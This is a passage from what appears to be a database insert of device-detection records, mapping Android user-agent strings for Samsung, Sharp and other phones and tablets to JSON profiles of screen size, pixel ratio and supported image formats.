Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N960N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-S367VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-S767VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T295) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T510) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T515) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T590) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T595) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T720) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T725) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T820) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-T825) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-01M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-02M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SC-03L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV43-u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SCV46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-01L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-02M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-04L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-M05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-M06) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":678,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-M08) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-M09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-M12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SH-RM12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHT-AL09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHT-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV40_u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":678,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SHV48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SILVER_MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SKR-A0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SKR-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SKW-H0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 